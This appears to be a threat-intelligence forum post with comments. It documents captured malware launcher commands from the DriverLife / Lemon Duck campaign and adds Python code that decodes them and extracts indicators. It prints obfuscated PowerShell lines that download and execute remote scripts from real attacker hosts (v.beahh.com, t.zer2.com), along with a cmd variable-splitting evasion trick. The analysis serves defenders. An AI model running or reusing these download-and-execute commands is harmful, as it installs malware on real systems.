Intrusion · Remote-control server
Intrusion: remote-control backdoor
Anonymous user 2019-09-25 10:03:43 2042 views

Captured on one of the systems:

powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=

Decoded (the -e argument): powershell -ep bypass -e IEX (New-Object Net.WebClient).downloadstring('http://v.beahh.com/v'+$env:USERDOMAIN)





cmd /c "set A=power& call %A%shell -ep bypass -e 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"

Decoded (the -e argument): cmd /c "set A=power& call %A%shell -ep bypass -e $Lemon_Duck='OgmAR';$y='http://t.zer2.com/v.js';$z=$y+'p'+'?eb_20190903';$m=(New-Object System.Net.WebClient).DownloadData($y);[System.Security.Cryptography.MD5]::Create().ComputeHash($m)|foreach{$s+=$_.ToString('x2')};if($s -eq 'd8109cec0a51719be6f411f67b3b7ec1'){IEX(-join[char[]]$m)}"
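The two captured launcher lines, decoded and triaged in Python, as an added example that is not part of the original post. It undoes the cmd variable-substitution trick (set A=power& call %A%shell) before locating the -e blob, decodes the blob as base64 over UTF-16LE (the form PowerShell's -EncodedCommand takes), pulls out the static URL prefix and the MD5 gate, and replicates the stager's hash check so an analyst can confirm a retrieved v.js is the payload the stager expected. The post does not reproduce the base64 of the second line, so CAPTURED_2 is constructed here by re-encoding the decoded script the post shows. One caveat the decoded text makes visible: the first stager completes its URL from the victim's $env:USERDOMAIN, so the full URL differs per victim and only the host v.beahh.com is a stable indicator.

```python
"""Decode and triage the two captured launcher lines from the post (added example)."""
import base64
import hashlib
import re

# Captured line 1, copied verbatim from the post.
CAPTURED_1 = (
    "powershell -ep bypass -e "
    "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA="
)

# Second stager as the post shows it after decoding. Its base64 is not reproduced in the
# post, so CAPTURED_2 is constructed here by re-encoding this text the way PowerShell does.
STAGER_2 = (
    "$Lemon_Duck='OgmAR';$y='http://t.zer2.com/v.js';$z=$y+'p'+'?eb_20190903';"
    "$m=(New-Object System.Net.WebClient).DownloadData($y);"
    "[System.Security.Cryptography.MD5]::Create().ComputeHash($m)|foreach{$s+=$_.ToString('x2')};"
    "if($s -eq 'd8109cec0a51719be6f411f67b3b7ec1'){IEX(-join[char[]]$m)}"
)


def encode_command(script: str) -> str:
    """Build a -EncodedCommand argument: base64 over UTF-16LE, the form PowerShell expects."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


CAPTURED_2 = 'cmd /c "set A=power& call %A%shell -ep bypass -e ' + encode_command(STAGER_2) + '"'

# -e, -ec, -enc and -EncodedCommand all take the blob; -ep (ExecutionPolicy) must not match.
ENC_RE = re.compile(r"(?<!\S)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def resolve_cmd_variables(cmdline: str) -> str:
    """Undo the `set A=power& call %A%shell` split: substitute each `set NAME=VALUE&` into %NAME%."""
    names = {}
    for name, value in re.findall(r"set\s+(\w+)=([^&\"]*)&", cmdline, re.IGNORECASE):
        names[name.upper()] = value
    return re.sub(r"%(\w+)%", lambda m: names.get(m.group(1).upper(), m.group(0)), cmdline)


def decode_encoded_command(cmdline: str) -> str:
    """Return the PowerShell source hidden behind the -e argument of a captured command line."""
    m = ENC_RE.search(resolve_cmd_variables(cmdline))
    if not m:
        raise ValueError("no -EncodedCommand argument found")
    return base64.b64decode(m.group(1)).decode("utf-16-le")


def extract_iocs(script: str) -> dict:
    """Pull static URL prefixes, their hosts, and any MD5 gate out of a decoded stager.

    dynamic_url flags a URL completed at run time from the victim's environment
    (here $env:USERDOMAIN): the full URL then varies per victim and only the host is stable.
    """
    urls = re.findall(r"https?://[^\s'\"]+", script)
    hosts = sorted({re.sub(r"^https?://", "", u).split("/")[0] for u in urls})
    md5s = re.findall(r"\b[0-9a-f]{32}\b", script)
    return {"urls": urls, "hosts": hosts, "md5": md5s, "dynamic_url": "$env:" in script}


def stager_would_execute(payload: bytes, expected_md5: str) -> bool:
    """Replicate the stager's gate: it IEXes the download only if its MD5 equals the embedded hash."""
    return hashlib.md5(payload).hexdigest() == expected_md5.lower()


if __name__ == "__main__":
    for line in (CAPTURED_1, CAPTURED_2):
        script = decode_encoded_command(line)
        print(script)
        print(extract_iocs(script))
    # Constructed stand-in for a retrieved v.js; a real sample must hash to the stager's value.
    sample = b"Write-Host 'not the real v.js'"
    print(stager_would_execute(sample, "d8109cec0a51719be6f411f67b3b7ec1"))
```

Run it directly to print both decoded scripts and their indicators. The hash gate is worth keeping in mind when hunting: the second stager refuses to run anything but the exact v.js it was built for, so a sample pulled later from t.zer2.com that hashes differently is a newer payload, not the one this launcher delivered.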

Threat-intel annotation: domains (2); URL (1): t.zer2.com/v.js
Perfect 2019-12-11 10:26:19
Could someone tell me how to decrypt this encryption?
luolin6888 2019-09-30 23:09:01
I don't understand this. Is any master taking apprentices? I want to learn security.
xiqing_ao 2019-09-30 09:35:22
v.beahh.com: 驱动人生 (DriverLife)
root3306 2019-09-27 13:52:59
驱动~人生
tanxing 2019-09-26 11:03:18
驱动~人生
Anonymous user 2019-09-25 10:05:49
驱动~人生